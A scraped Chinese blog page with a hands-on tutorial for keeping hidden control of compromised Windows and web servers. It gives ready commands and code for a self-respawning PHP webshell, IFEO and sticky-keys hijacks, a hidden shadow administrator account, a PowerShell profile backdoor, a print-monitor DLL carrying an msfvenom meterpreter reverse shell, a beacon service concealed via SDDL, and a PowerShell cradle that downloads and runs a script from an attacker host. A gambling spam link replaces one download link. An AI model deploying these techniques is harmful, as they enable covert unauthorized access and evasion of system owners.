怎么给网站添加代码只做鱼网站

news/2025/10/6 17:02:28/文章来源:
怎么给网站添加代码,只做鱼网站,影视网站视频接口怎么做,商城网站建设价格1.php 不死马权限维持 ?php ignore_user_abort(); //关掉浏览器#xff0c;PHP脚本也可以继续执行. set_time_limit(0);//通过set_time_limit(0)可以让程序无限制的执行下去 $interval 5; // 每隔*秒运行 do { $filename test.php; if(file_exists($filename)) { echo…1.php 不死马权限维持 ?php ignore_user_abort(); //关掉浏览器PHP脚本也可以继续执行. set_time_limit(0);//通过set_time_limit(0)可以让程序无限制的执行下去 $interval 5; // 每隔*秒运行 do { $filename test.php; if(file_exists($filename)) { echo xxx; } else { $file fopen(test.php, w); $txt ?php phpinfo();?\n; fwrite($file, $txt); fclose($file); } sleep($interval); } while (true) ? 效果 2.映像劫持技术 进入注册表 注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options 在下面添加一项这里的命名与后续要触发的可执行文件程序文件名一致这里我新建了一个moon.exe 然后在moon.exe的右侧新建一个Debugger在输入值的栏目中填入你的后门绝对路径我这里以cmd.exe为例。 在桌面 修改一个文件的文件名为moon.exe 双击 即可触发 如果想写入后门 把 路径换成你后门地址即可 3.策略组脚本维持 输入gpedit.msc 打开组策略打开 windows设置 脚本 里面又关机和开机 在 C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup 新建1.bat echo off systeminfo 1.txt 启动时 选择该脚本文件即可 重启后 4.shift后门 按着shift五下 会弹出 首先 更改sethc.exe拥有者 为administrator move C:\windows\system32\sethc.exe C:\windows\system32\sethc.exe.bak Copy C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe 5.建立影子账号 通常在拿到服务器后会创建一个带$符号的账户因为在常规cmd下是无法查看到的。 net user moonsec$ 123456 /add net localgroup administrators moonsec$ /add net user 通过管理用户可查到用户 通过创建影子账户则可以完全解决这种问题。 打开注册表 HEKY_LOCAL_MACHINE\SAM\SAM\Domains\Account\User 3e9是moonsec$用户 1F4是超级管理员的值 将1F4下F项的值复制到3e9下F项里面替换原有数据。然后导出moonsec$以及3e9。 删除 ner user moonsec$ /del 删除这个用户 再导入注册表 可以看到 用户已经不现实在这个面板了 用moonsec$登录远程终端 6.powershell配置文件后门 Powershell配置文件其实就是一个powershell脚本他可以在每次运行powershell的时候自动运行所以可以通过向该文件写入自定义的语句用来长期维持权限。 依次输入以下命令查看当前是否存在配置文件 echo $profile Test-path $profile 如果返回false则需要创建一个 New-Item -Path $profile -Type File –Force 然后写入命令这里我以创建一个用户为目标也可以写成反弹shell的因为之前测试过程中写入过数据所以这里我是三条内容。 1.bat内容 net user moon 123456 /add net localgroup administrators moon /add 这里的C:\1.bat是我的后门文件位置实战情况下各位需要按照实际文件路径来修改 $string Start-Process C:\1.bat $string | Out-File -FilePath $profile -Append more $profile 重新打开powershell就会自动执行 7.Monitor 权限维持 项目地址 GitHub - Al1ex/Monitor: A old way to Persistence 项目使用 Step1下载该项目之后使用VS编译Monitor.cpp当然也可以使用编译好的Monitor.cpp代码如下所示 #include Windows.h int main() { MONITOR_INFO_2 monitorInfo; TCHAR env[12] TEXT(Windows x64); TCHAR name[12] TEXT(Monitor); TCHAR dll[12] TEXT(test.dll); monitorInfo.pName name; monitorInfo.pEnvironment env; monitorInfo.pDLLName dll; AddMonitor(NULL, 2, (LPBYTE)monitorInfo); return 0; } pName //监视器名称 pEnvironment //环境架构 pDLLName //监视器DLL文件的名称 Step 2使用Msfvenom生成dll攻击载荷 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.1.53 LPORT4444 -f dll test.dll Step 3将shell.dll复制到目标主机的system32目录下之后重命名为test.dll(也就是上面的PDLLName你也可以自己修改为自己喜欢的总之随意) copy C:\Users\Administrator\Desktop\test.dll C:\Windows\System32\test.dll Step 4之后进入system32目录并执行以下命(Monitors.exe为之前编译好的文件也需要放置到system32目录下) Step 5之后成功接收到Meterpreter会话 持久化实现 为了实现持久性我们需要在Monitors注册表位置下设置一个key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors 之后在命令行下执行以下命令创建一个注册表项该注册表项将包含值test.dll从编辑器中查看注册表验证密钥是否已创建 reg add hklm\system\currentcontrolset\control\print\monitors\Pentestlab /v Driver /d test.dll /t REG_SZ 下次重新启动时spoolsv.exe进程将加载Monitors注册表项中存在并存储在Windows文件夹System32中的所有驱动程序DLL文件 下图演示了Meterpreter会话已建立与Print Spooler服务(SYSTEM)相同级别的特权并且已从System32文件夹执行了 8.利用安全描述符隐藏服务后门进行权限维持 1 先cs上线 2 通过注册服务创建后门 将后门程序注册为自启动服务是我们常用的一种进行权限维持的方法通常可以通过sc或者powershell 来进行创建。cmd创建自启动服务 sc create .NET CLR Networking 3.5.0.0 binpath cmd.exe /k C:\Users\administrator\beacon.exe depend Tcpip obj Localsystem start auto 通过修改SDDL(安全描述符)隐藏服务 众所周知windows访问控制模型分为两部分 access token(访问令牌) 安全描述符 安全描述符包含与安全对象关联的安全信息。安全描述符包含安全描述符结构及其关联的安全信息。安 全描述符可以包含以下安全信息 对象的所有者和主要组的 Sid安全标识符 用于指定允许或拒绝特定用户或组的访问权限的 DACL 。 指定为对象生成审核记录的访问尝试类型的 SACL 。 一组限制安全描述符或其各个成员的含义的控制位。 windows中的安全对象都使用SDDL字符串来表示访问对象对于安全对象的权限服务自然也存在其SDDL并且sc命令中可以设置SDDL。那么通过更改SDDL可以修改服务的各种权限来隐藏服务 sc sdset .NET CLR Networking 3.5.0.0 D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) 然后通过sc与get-server查找服务均无结果 sc query |findstr .NET CLR Networking 3.5.0.0 get-service | findstr .NET CLR Networking 3.5.0.0 在知道服务名的前提下查询会显示拒绝访问 sc query .NET CLR Networking 3.5.0.0 但这样做有一个问题在注册表中很容易看到异常value。HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking 3.5.0.0 修改注册表ACL 我们可以通过修改注册表的DACL来拒绝对值的查询达到隐藏异常值的效果。这里给出一个通过 powershell修改注册表项的访问权限的简单脚本 在1.ps1脚本 function Server-Sddl-Change{ [CmdletBinding()] param ( [parameter(Mandatory$false)][String]$Name ) $ROOT HKLM:\SYSTEM\CurrentControlSet\Services\ $S $ROOT$NAME $acl Get-Acl $S $acl.SetAccessRuleProtection($true, $false) $person [System.Security.Principal.NTAccount]Everyone $access [System.Security.AccessControl.RegistryRights]QueryValues $inheritance [System.Security.AccessControl.InheritanceFlags]None $propagation [System.Security.AccessControl.PropagationFlags]None $type [System.Security.AccessControl.AccessControlType]Deny $rule New-Object System.Security.AccessControl.RegistryAccessRule( $person,$access,$inheritance,$propagation,$type) $acl.AddAccessRule($rule) $person [System.Security.Principal.NTAccount]Everyone $access [System.Security.AccessControl.RegistryRights]SetValue,CreateSubKey,EnumerateSu bKeys,Notify,CreateLink,Delete,ReadPermissions,WriteKey,ExecuteKey,ReadKey,Chang ePermissions,TakeOwnership $inheritance [System.Security.AccessControl.InheritanceFlags]None $propagation [System.Security.AccessControl.PropagationFlags]None $type [System.Security.AccessControl.AccessControlType]Allow $rule New-Object System.Security.AccessControl.RegistryAccessRule( $person,$access,$inheritance,$propagation,$type) $acl.AddAccessRule($rule) Set-Acl $S $acl } 在kali上启动http服务 python -m http.server 81 远程加载powershell脚本 powershell.exe -exec bypass -nop -w hidden -c IEX((new-object net.webclient).downloadstring(http://192.168.1.52:81/1.ps1));Server-Sddl-Change - Name .NET CLR Networking 3.5.0.0.NET CLR Networking 3.5.0.0 改成你的服务名 从下图可见已将值从该服务项中隐藏 我这里不知什么原因没有隐藏 重启计算机 获取后门 9.iis后门 web服务器上一般都 支持net 所以可以考虑利用net iis做一个后门 项目地址 GitHub - WBGlIl/IIS_backdoor: backdoor 1 新建web服务器 选择web服务器和应用程序服务器 点击下一步 点击下一步 勾选iis管理控制台 点击下一步 勾选web服务器(IIS)支持 选择安装 再次安装 剩下就是下一步以及安装查看IP地址 有浏览器访问 在网站目录下新建一个bin文件夹 这个文件夹 存放dll集 把IIS_backdoor_dll.dll存放在这里面 新建 web.config 或者在原有的文件上添加 内容 打开 IIS_backdoor_shell 把网址填写进去即可 10.window 隐藏技术 使用Attrib s a h r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。 这样就做到了真正的隐藏不管你是否显示隐藏文件此文件夹都看不见 Attrib s a h r 1.php 这样算是隐藏 其实还有查看方法 11.驱动级文件隐藏 Attrib s a h r 1.php驱动隐藏最典型的现象就是系统盘中存在以下文件 c:\WINDOWS\xlkfs.dat c:\WINDOWS\xlkfs.dll c:\WINDOWS\xlkfs.ini c:\WINDOWS\system32\drivers\xlkfs.sys 驱动隐藏我们可以用过一些软件来实现软件名字叫Easy File Locker 下载链接 GOPAY303 : SITUS GACOR TERBARU GAMPANG JAKCPOT DAFTAR PAKAI LINK GACOR GOPAY303 一般做黑链的小朋友都会这样设置只勾选可读其他的一律拒绝……那么会有这样的效果该文件不会显示不能通过列目录列出来也不能删除除非你知道完整路径你才可以读取文件内容。并且该软件还可以设置密码启动、修改设置、卸载及重复安装的时候都需要密码更蛋疼的是主界面、卸载程序等都可以删除只留下核心的驱动文件就行了。 如何清除 1、查询服务状态 sc qc xlkfs 2、停止服务 net stop xlkfs 服务停止以后经驱动级隐藏的文件即可显现 3、删除服务 sc delete xlkfs 4、删除系统目录下面的文件重启系统确认服务已经被清理了

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/929529.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

什么叫静态网站seo网络培训

目录 报错信息 解决方法 报错信息 如下所示(地址已盲): 控制台报错说找不到这些资源,但是 dist 目录下都有这些 JS 文件啊,这是为什么? 解决方法 在 Vue 项目的 vue.config.js 文件中,添加 …

丝绸之路网站平台建设网站底部 图标

近年来,很多人想要从其他行业跳槽转入计算机领域。非计算机科班如何丝滑转码? 如何规划才能实现转码? 对于非计算机科班的人来说,想要顺利转码成为计算机相关岗位的从业者,需要经过以下几个步骤: 规划转码…

网站建设如何选择宝安网站设计流程

场景还原 今天有小伙伴练习Nginx配置负载均衡时总是无法使用配置好的网址访问 配置文件信详情 http {# 负载均衡 后端IP地址和端口 webservers 策略 轮询upstream webservers{server 192.168.1.100:8080 weight90; server 127.0.0.1:8080 weight10; }server{listen 80;ser…

Java基础 Day28 完结篇 - 实践

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

实用指南:第三十三天打卡复习

实用指南:第三十三天打卡复习pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco"…

实用指南:Hardening fixes lead to hard questions

实用指南:Hardening fixes lead to hard questionspre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas"…

赛前训练6 状压

A 简单树上差分. B 维护 \(d_{i,j}\) 表示人 \(i\) 在第 \(j\) 位与哪些人有区别.预处理即可. 对于每个人,枚举提问的二进制状态;对于提问的每个二进制位,将它们的 \(d\) 全部拼起来,若能拼成 ((1<<n)-1)^(1<…

排序综合

1、基础排序(cmp函数自定义排序) `struct Ren { int a;int b; }ren[1000010]; bool cmp(const Ren& i, const Ren& j) { if (i.zhi < j.zhi) { return true; } else { if (i.zhi == j.zhi) { if (i.ji &g…

Java从入门到精通 - 常用API(一) - 详解

Java从入门到精通 - 常用API(一) - 详解2025-10-06 16:50 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: bloc…

NKOJ全TJ计划——NP11745

题目内容 最小割板子 小 E 有一棵有\(n\) 个点的无根树,它的节点编号为\(1\) 到\(n\) ,其中第\(i(i\in [1,n-1])\) 条边连接节点\(u_i\)和\(v_i\) 。同时他还有\(m\)条树上的路径,第\(i\)条路径为从节点\(a_i\)到\(…

InfinityFree教程 ——免费搭建属于你的网站

本文讲述了如何通过 "InfinityFree" 搭建免费的纯前端网站💖** InfinityFree 简介** InfinityFree是一个提供免费虚拟主机服务的平台,提供免费虚拟主机。每个账户可创建3个站点,支持自定义域名(需使用其…

深入解析:npm、yarn幽灵依赖问题

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

营销网站的案例分析wordpress用图床好还是

在快节奏的现代生活中&#xff0c;个人债务问题似乎已成为许多人不得不面对的挑战。正确处理个人债务&#xff0c;不仅关系到个人信用和财务状况&#xff0c;更是实现财务自由的重要一步。本文将为您提供一些实用的建议&#xff0c;帮助您优雅地解决个人债务问题&#xff0c;走…

10.6 模考 T4(QOJ 1836)

题意:给定 \(n\) 个点 \(m\) 条边的无向图,定义“花”为一个拥有 \(4\) 个结点的导出子图,这个导出子图有 \(1\) 条边或 \(5\) 条边。定义“叶”为一个拥有 \(4\) 个结点的导出子图,这个导出子图有 \(3\) 条边,且…

iTunes 无法备份 iPhone:10 种解决方法 - 详解

iTunes 无法备份 iPhone:10 种解决方法 - 详解pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", &…

实用指南:【Node.js 深度解析】npm install 遭遇:npm ERR! code CERT_HAS_EXPIRED 错误的终极解决方案

实用指南:【Node.js 深度解析】npm install 遭遇:npm ERR! code CERT_HAS_EXPIRED 错误的终极解决方案pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: b…

关于调和级数估算前n项的和

我们要估算 \(\displaystyle\sum^n_{i = 1}\dfrac{1}{i}\)。 我们知道 \(\displaystyle\sum^n_{i = 1}\dfrac{1}{i}\approx \int_1^n\dfrac{1}{i} = (\ln\left|i\right|)\bigg |^n_1 = \ln n - \ln 1 = \ln n\)。 因此…

专业的网站优化黑马前端学费多少

CCIE理论-第五篇-SDA-2 DNA Center 展示一下web的界面哈 其实就类似平时弄的web的防火墙呀,其他设备等 弹性子网 这一章来讲讲弹性子网 stretched subnets allow an ip subnet to be :stretched:vla the overlay 拉伸子网允许通过覆盖“拉伸”IP子网1基于主机IP的流量…

Windows install RabbitMQ via PowerShell via administrator role

//Run PowerShell as Administrator role //Run below commands respectively //First command Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.N…

Windows漏洞利用技巧:虚拟内存访问陷阱(2025更新)

本文详细介绍了在Windows系统中构建虚拟内存访问陷阱的技术方法,重点分析了Windows 11 24H2新特性如何让攻击者能够利用本地SMB服务器进行内存访问延迟攻击,为利用TOCTOU类型内核漏洞提供了新的攻击向量。Windows漏洞…